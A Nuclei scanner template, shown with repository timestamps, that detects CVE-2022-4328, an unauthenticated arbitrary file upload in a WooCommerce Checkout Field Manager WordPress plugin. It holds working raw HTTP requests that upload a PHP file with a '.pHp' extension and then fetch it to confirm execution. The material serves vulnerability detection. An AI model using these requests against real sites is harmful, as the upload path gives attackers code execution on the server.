nuclei-templates/http/cves/2022/CVE-2022-4328.yaml

65 lines
2.2 KiB
YAML
Raw Normal View History

2023-05-06 12:12:20 +00:00
id: CVE-2022-4328
info:
name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 18.0
2023-05-06 12:12:20 +00:00
reference:
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4328
cwe-id: CWE-434
epss-score: 0.59729
epss-percentile: 0.97436
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
2023-05-06 12:12:20 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: najeebmedia
product: woocommerce_checkout_field_manager
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive
2023-05-06 12:12:20 +00:00
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
--------------------------22728be7b3104597
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("CVE-2022-4328"); ?>
--------------------------22728be7b3104597--
- |
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-07-11 19:49:27 +00:00
- fe5df26ce4ca0056ffae8854469c282f
2023-05-06 12:12:20 +00:00
- type: word
part: header
words:
2023-07-11 19:49:27 +00:00
- text/html
2023-05-06 12:12:20 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100ad3016886e3a165a42d6e3daccb7912bf8170d8b8a7a9a04e89a0972696209f40220211b264ef6aeb229d4e2adcf9e1fcda4e3673689b6ca9de8c5a9f57ece3faeb0:922c64590222798bb761d5b6d8e72950